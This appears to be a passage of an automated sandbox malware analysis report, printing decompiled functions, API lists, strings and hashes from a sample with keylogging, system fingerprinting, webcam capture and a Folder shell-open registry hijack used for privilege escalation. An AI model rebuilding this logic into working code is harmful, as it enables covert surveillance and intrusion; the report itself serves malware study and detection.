										_t21 = _t76 + 0x28; // 0x0
										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *_t21, _t49);
										if(_t49 >= 0) {
											_t23 = _t76 + 0x18; // 0x0
											_t60 =  *_t23;
											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
											E0025102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
											E002602B1( &_v200);
											_t107 = _a4;
											E002608F0(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
											_t35 = _t76 + 0xc; // 0x0
											E0025582B(_t76 & 0xffffff00 | _t107 -  *_t35 > 0x00000000);
											_t38 = _t76 + 4; // 0x0
											_t91 = 7;
											memcpy(_t121 + 0xc - 0x1c,  *( *_t38 + _t107 * 4), _t91 << 2);
											E0026039E( *_t76);
											_t49 = E0026044E();
											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
											if(_t49 != 0) {
												_t44 = _t76 + 0x18; // 0x0
												_t71 =  *_t44;
												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
												_t46 = _t76 + 0x24; // 0x0
												_t96 =  *_t46;
												_t47 = _t76 + 0x34; // 0x3c0a8c
												_t118 = _t47;
												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x262580, _t118);
												_t97 =  *_t118;
												if(_t97 != 0) {
													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t49;
			}
































                                      0x00260ade
                                      0x00260ae0
                                      0x00260ae6
                                      0x00260ae6
                                      0x00260af8
                                      0x00260afe
                                      0x00260b02
                                      0x00260b0a
                                      0x00260b0a
                                      0x00260b14
                                      0x00260b16
                                      0x00260b1a
                                      0x00260b23
                                      0x00260b26
                                      0x00260b26
                                      0x00260b2b
                                      0x00260b32
                                      0x00260b32
                                      0x00260b3a
                                      0x00260b40
                                      0x00260b40
                                      0x00260b52
                                      0x00260b58
                                      0x00260b5c
                                      0x00260b69
                                      0x00260b6d
                                      0x00260b70
                                      0x00260b7c
                                      0x00260b87
                                      0x00260b91
                                      0x00260b91
                                      0x00260b97
                                      0x00260b9d
                                      0x00260ba0
                                      0x00260ba1
                                      0x00260ba2
                                      0x00260bab
                                      0x00260bac
                                      0x00260bad
                                      0x00260bae
                                      0x00260bb1
                                      0x00260bb7
                                      0x00260bbc
                                      0x00260bc1
                                      0x00260bca
                                      0x00260bcf
                                      0x00260bd4
                                      0x00260bda
                                      0x00260bda
                                      0x00260bde
                                      0x00260be4
                                      0x00260be9
                                      0x00260bef
                                      0x00260bef
                                      0x00260bfc
                                      0x00260c11
                                      0x00260c1f
                                      0x00260c27
                                      0x00260c33
                                      0x00260c38
                                      0x00260c3e
                                      0x00260c43
                                      0x00260c4e
                                      0x00260c51
                                      0x00260c55
                                      0x00260c5d
                                      0x00260c62
                                      0x00260c67
                                      0x00260c69
                                      0x00260c69
                                      0x00260c73
                                      0x00260c76
                                      0x00260c76
                                      0x00260c79
                                      0x00260c79
                                      0x00260c85
                                      0x00260c87
                                      0x00260c8b
                                      0x00000000
                                      0x00260c90
                                      0x00260c8b
                                      0x00260c67
                                      0x00260be9
                                      0x00260bd4
                                      0x00260bc1
                                      0x00260b5c
                                      0x00260b3a
                                      0x00260b1a
                                      0x00260c97

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00260AE0
                                      • CoCreateInstance.OLE32(00262560,00000000,00000001,00264854,003C0A70), ref: 00260AF8
                                      • CoCreateInstance.OLE32(002625B0,00000000,00000001,00264844,003C0A7C), ref: 00260B52
                                        • Part of subcall function 00260831: CoCreateInstance.OLE32(002625A0,00000000,00000001,00264834,?), ref: 0026085F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInstance$Initialize
                                      • String ID: Grabber$Source$vids
                                      • API String ID: 1108742289-4200688928
                                      • Opcode ID: a0112be5fed505663dece1a6677a1c21f1aff278b30d1a1d577af65d9dd5c373
                                      • Instruction ID: 98ae4c42c9cbb04c22918db6ebf6d735013a88adac7872fc17ac8f2af4fba1e1
                                      • Opcode Fuzzy Hash: a0112be5fed505663dece1a6677a1c21f1aff278b30d1a1d577af65d9dd5c373
                                      • Instruction Fuzzy Hash: 79519B71A10601AFCB28DF64CCD5F9A3766EF49700B2045A8FD05AF295DBB1E8A5CF90
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 012EAC39, Relevance: 10.7, APIs: 7, Instructions: 162fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32 ref: 012EAC7B
                                      • __fassign.LIBCMT ref: 012EACFA
                                      • __fassign.LIBCMT ref: 012EAD19
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 012EAD46
                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 012EAD66
                                      • WriteFile.KERNEL32(?,012ED148,00000001,?,00000000), ref: 012EADA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 374ea1649a4082b1562af309e5b440ef0be241f6768767a2f5457a40c21c0f78
                                      • Instruction ID: cb791077f9acbe54bee0b12be677daad32336f30e2613279f58b5a63bb09fa07
                                      • Opcode Fuzzy Hash: 374ea1649a4082b1562af309e5b440ef0be241f6768767a2f5457a40c21c0f78
                                      • Instruction Fuzzy Hash: 9E51C470D1024AAFDB10CFA8D899AEEBBF8FF09311F14816AE656E7251D731D941CB60
                                      Uniqueness

                                      Uniqueness Score: 0.61%

                                      Function 012E1DD0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117UNIQUE
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 012E1DFB
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 012E1E03
                                      • _ValidateLocalCookies.LIBCMT ref: 012E1E91
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 012E1EBC
                                      • _ValidateLocalCookies.LIBCMT ref: 012E1F11
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 4a727742874cb20b7994b7dd8376a6447adcdcc66524052ac64672d2e1378fd8
                                      • Instruction ID: 2eb382d2d37a3fe6ce45fb259258dc32a81063b519d05e6f4864b1678e055f40
                                      • Opcode Fuzzy Hash: 4a727742874cb20b7994b7dd8376a6447adcdcc66524052ac64672d2e1378fd8
                                      • Instruction Fuzzy Hash: 8E41D634E2020ADBCF10DF6CC8489AEBFF9AF44314F488065E9155B395D771DA25CB90
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00252B29, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107stringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 95%
                                      			E00252B29(void* __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v76;
				char _v344;
				short _v864;
				void* __edi;
				void* _t28;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t54;
				void* _t75;
				void* _t76;
				void* _t81;
				void* _t82;
				void* _t84;

				_t84 = __eflags;
				_t54 = __ecx;
				_t76 = __edx;
				E0025D7A9(E0025D8DA( &_v24, __edx),  &_v20);
				GetModuleFileNameA(0,  &_v344, 0x104);
				_v16 = 0;
				_t28 = E0025FC79( &_v344,  &_v16);
				_v12 = 0;
				E0025F9F3(_t28, _v16,  &_v12,  &_v12);
				_t82 = _t81 + 4;
				E00253412(_t82, _v20);
				E00253412(_t82, _v24);
				_t32 = E0025D9BA();
				E00253412(_t82, 0x262608);
				_t64 = _t82;
				E0025DC19(_t82);
				_t35 = E0025DBF3(_t82);
				_t36 = E0025DB97();
				_t37 = E0025D9DD();
				E0025DC53(_t82, _v16);
				E00254B53(_t54, E00253EA1( &_v76, _v16, _t84, _t82, _t64, 0xdc, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
				E00253E5F( &_v76, _t76);
				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
					E00251052( &_v864, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
					lstrcatW( &_v864, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v864, 0);
					E002585B6(_t54, 1);
					_v12 = 0x264970;
					E00254B53(_t54,  &_v12);
				}
				E00255A2D(_v20);
				return E00255A2D(_v24);
			}






















                                      0x00252b29
                                      0x00252b34
                                      0x00252b3a
                                      0x00252b44
                                      0x00252b58
                                      0x00252b61
                                      0x00252b6a
                                      0x00252b79
                                      0x00252b7c
                                      0x00252b84
                                      0x00252b8c
                                      0x00252b95
                                      0x00252b9a
                                      0x00252bab
                                      0x00252bb1
                                      0x00252bb3
                                      0x00252bb8
                                      0x00252bbe
                                      0x00252bc4
                                      0x00252bd3
                                      0x00252be3
                                      0x00252beb
                                      0x00252bf5
                                      0x00252c04
                                      0x00252c18
                                      0x00252c2a
                                      0x00252c38
                                      0x00252c41
                                      0x00252c49
                                      0x00252c53
                                      0x00252c53
                                      0x00252c5b
                                      0x00252c6c

                                      APIs
                                        • Part of subcall function 0025D7A9: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0025D7C0
                                        • Part of subcall function 0025D7A9: CoInitialize.OLE32(00000000), ref: 0025D7C7
                                        • Part of subcall function 0025D7A9: CoCreateInstance.OLE32(00262460,00000000,00000017,00264330,?), ref: 0025D7E5
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00252B58
                                        • Part of subcall function 0025FC79: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0025FCA6
                                        • Part of subcall function 0025FC79: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00252B6F), ref: 0025FCB1
                                        • Part of subcall function 0025FC79: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0025FCC2
                                        • Part of subcall function 0025FC79: CloseHandle.KERNEL32(00000000), ref: 0025FCC9
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 0025D9BA: GlobalMemoryStatusEx.KERNEL32(?), ref: 0025D9CB
                                        • Part of subcall function 0025DC19: GetComputerNameW.KERNEL32(00252BB8,00000010), ref: 0025DC3C
                                        • Part of subcall function 0025DBF3: GetCurrentProcess.KERNEL32(?,?,00252BBD,?,00262608,?,?,00000000,?,?,?), ref: 0025DBF7
                                        • Part of subcall function 0025DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0025DBA9
                                        • Part of subcall function 0025DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0025DBB0
                                        • Part of subcall function 0025DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0025DBCE
                                        • Part of subcall function 0025DB97: CloseHandle.KERNEL32(00000000), ref: 0025DBE3
                                        • Part of subcall function 0025D9DD: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0025D9F5
                                        • Part of subcall function 0025D9DD: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0025DA05
                                        • Part of subcall function 0025DC53: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0025DC97
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00252C18
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00252C2A
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00252C38
                                        • Part of subcall function 002585B6: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585C2
                                        • Part of subcall function 002585B6: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585D9
                                        • Part of subcall function 002585B6: EnterCriticalSection.KERNEL32(002677C8,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585E5
                                        • Part of subcall function 002585B6: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585F5
                                        • Part of subcall function 002585B6: LeaveCriticalSection.KERNEL32(002677C8,?,00000000), ref: 00258648
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                      • String ID: \Microsoft Vision\$pI&
                                      • API String ID: 1987359387-1661440369
                                      • Opcode ID: ec5038f74bdd426eeb5a7b96629c9e20d260604b9fac989f54e96786c946dbe0
                                      • Instruction ID: 56bcbd09b8b17df4f0797fba86a21da49fcc901827710c632791dc2bf5e49d7f
                                      • Opcode Fuzzy Hash: ec5038f74bdd426eeb5a7b96629c9e20d260604b9fac989f54e96786c946dbe0
                                      • Instruction Fuzzy Hash: C231B0B1A20518BBCB14FBA0DC56DEEB77CAF44306F004065B905A2182DA705E6DCFA9
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012E98B6, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 012E987E: _free.LIBCMT ref: 012E98A3
                                      • _free.LIBCMT ref: 012E9904
                                        • Part of subcall function 012E628A: HeapFree.KERNEL32(00000000,00000000), ref: 012E62A0
                                        • Part of subcall function 012E628A: GetLastError.KERNEL32(?,?,012E98A8,?,00000000,?,00000000,?,012E98CF,?,00000007,?,?,012E9CD3,?,?), ref: 012E62B2
                                      • _free.LIBCMT ref: 012E990F
                                      • _free.LIBCMT ref: 012E991A
                                      • _free.LIBCMT ref: 012E996E
                                      • _free.LIBCMT ref: 012E9979
                                      • _free.LIBCMT ref: 012E9984
                                      • _free.LIBCMT ref: 012E998F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 815bc0071f0b4a8f649899424cf45e433ae55eb76270d98698b1a9d2e1f79aa2
                                      • Instruction ID: c7cde9d29854c209ee8c07940e0dbef61dfae28f49ca54fd6698e54706e11232
                                      • Opcode Fuzzy Hash: 815bc0071f0b4a8f649899424cf45e433ae55eb76270d98698b1a9d2e1f79aa2
                                      • Instruction Fuzzy Hash: 66114F71564B05EAE920FBB0CC09FEB77DC6F25704F800A16A29BAA071DE76F5448B90
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 002585B6, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E002585B6(char _a4, intOrPtr _a8) {
				void _v28;
				void* _t13;
				signed int _t14;

				InitializeCriticalSection( &_v28);
				_t14 = 6;
				DeleteCriticalSection(memcpy(0x2677c8,  &_v28, _t14 << 2));
				EnterCriticalSection(0x2677c8);
				_t5 =  &_a4; // 0x252c46
				 *0x2677f0 =  *_t5;
				GetModuleHandleA(0);
				 *0x266690 = 0x266da0;
				if(_a8 == 0) {
					E00251E9A(0x267814);
					 *0x266da0 = 1;
					_t13 = E00251E6F(0x26780c, E0025822F, 0x266da0);
				} else {
					_t13 = E00251E6F(0x267814, E002574B4, 0x266da0);
					 *0x2677b4 = 1;
				}
				LeaveCriticalSection(0x2677c8);
				return _t13;
			}






                                      0x002585c2
                                      0x002585ca
                                      0x002585d9
                                      0x002585e5
                                      0x002585eb
                                      0x002585f0
                                      0x002585f5
                                      0x00258604
                                      0x0025860f
                                      0x00258628
                                      0x00258638
                                      0x00258642
                                      0x00258611
                                      0x00258617
                                      0x0025861c
                                      0x0025861c
                                      0x00258648
                                      0x00258651

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585C2
                                      • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585D9
                                      • EnterCriticalSection.KERNEL32(002677C8,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585E5
                                      • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585F5
                                      • LeaveCriticalSection.KERNEL32(002677C8,?,00000000), ref: 00258648
                                        • Part of subcall function 00251E6F: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00251E84
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                      • String ID: F,%
                                      • API String ID: 2964645253-4184053641
                                      • Opcode ID: 876bdbc4d538361e579dabd1599055f47ab069d8f1e19f80017fa277b75877db
                                      • Instruction ID: c3f90b29bb3707c03e551cda2f1b7bbdaa365261b1427b255a1797cf61fe7a2e
                                      • Opcode Fuzzy Hash: 876bdbc4d538361e579dabd1599055f47ab069d8f1e19f80017fa277b75877db
                                      • Instruction Fuzzy Hash: 20015E319282149BCB00AF54FC0EB9F7B69EB86756F008055FA0997292C7F58469CBA5
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00258654, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38libraryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E00258654() {
				intOrPtr _t1;

				_t1 = 5;
				 *0x2677c4 = _t1;
				 *0x266dac = 0;
				 *0x2677bc = _t1;
				 *0x2677c0 = 0;
				E00251815(0x2677b8, 0);
				InitializeCriticalSection(0x2677c8);
				E0025DE6C(0x2677f4, 0);
				asm("xorps xmm0, xmm0");
				 *0x2677e0 = 0;
				asm("movups [0x26780c], xmm0");
				 *0x2677f0 = 0;
				_t19 = LoadLibraryW(L"User32.dll");
				_push(0x2677f4);
				 *0x2677e4 = E0025E907(_t4, "GetRawInputData", 0);
				 *0x2677ec = E0025E907(_t19, "ToUnicode", 0);
				 *0x2677e8 = E0025E907(_t19, "MapVirtualKeyA", 0);
				return 0x266da0;
			}




                                      0x00258657
                                      0x0025865a
                                      0x00258664
                                      0x0025866a
                                      0x0025866f
                                      0x00258675
                                      0x0025867f
                                      0x0025868a
                                      0x0025868f
                                      0x00258692
                                      0x0025869d
                                      0x002586a4
                                      0x002586b0
                                      0x002586b7
                                      0x002586c4
                                      0x002586d5
                                      0x002586e2
                                      0x002586ed

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(002677C8,?,002511C1), ref: 0025867F
                                      • LoadLibraryW.KERNEL32(User32.dll), ref: 002586AA
                                        • Part of subcall function 0025E907: lstrcmpA.KERNEL32(?,0025F9CB,?,open,0025F9CB), ref: 0025E940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                      • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                      • API String ID: 4274177235-2474467583
                                      • Opcode ID: c048155ff1bdb7bdfad26d844e20ec2d957ae2eab88fd0bc572f4f08a3945b9f
                                      • Instruction ID: a7dad8df6b188c17fb3e40ae49249fa5cee4e3accd00ebaf3c24558c954b654d
                                      • Opcode Fuzzy Hash: c048155ff1bdb7bdfad26d844e20ec2d957ae2eab88fd0bc572f4f08a3945b9f
                                      • Instruction Fuzzy Hash: 7D016271A38660CF8746EF24BC0D1197A91E789B19711C21AF408DB351DBB005A5CFD4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025F65C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38registrystringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 73%
                                      			E0025F65C(void* __ecx, char* _a4, CHAR* _a8) {
				void* _v8;
				long _t9;
				int _t12;
				int _t15;
				long _t16;

				_t15 = lstrlenA(_a8);
				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
				if(_t9 == 0) {
					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
					RegCloseKey(_v8);
					if(_t16 == 0) {
						_t12 = 1;
					} else {
						_push(_t16);
						goto L2;
					}
				} else {
					_push(_t9);
					L2:
					SetLastError();
					_t12 = 0;
				}
				return _t12;
			}








                                      0x0025f66a
                                      0x0025f681
                                      0x0025f689
                                      0x0025f6ad
                                      0x0025f6af
                                      0x0025f6b7
                                      0x0025f6bc
                                      0x0025f6b9
                                      0x0025f6b9
                                      0x00000000
                                      0x0025f6b9
                                      0x0025f68b
                                      0x0025f68b
                                      0x0025f68c
                                      0x0025f68c
                                      0x0025f692
                                      0x0025f692
                                      0x0025f6c0

                                      APIs
                                      • lstrlenA.KERNEL32(0025F938,00264713,?,?,0025F938,00264713,?), ref: 0025F664
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,0025F938,00264713,?), ref: 0025F681
                                      • SetLastError.KERNEL32(00000000,?,?,0025F938,00264713,?), ref: 0025F68C
                                      • RegSetValueExA.ADVAPI32(?,00264713,00000000,00000001,0025F938,00000000,?,?,0025F938,00264713,?), ref: 0025F6A4
                                      • RegCloseKey.ADVAPI32(?,?,?,0025F938,00264713,?), ref: 0025F6AF
                                      Strings
                                      • Software\Classes\Folder\shell\open\command, xrefs: 0025F677
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseErrorLastOpenValuelstrlen
                                      • String ID: Software\Classes\Folder\shell\open\command
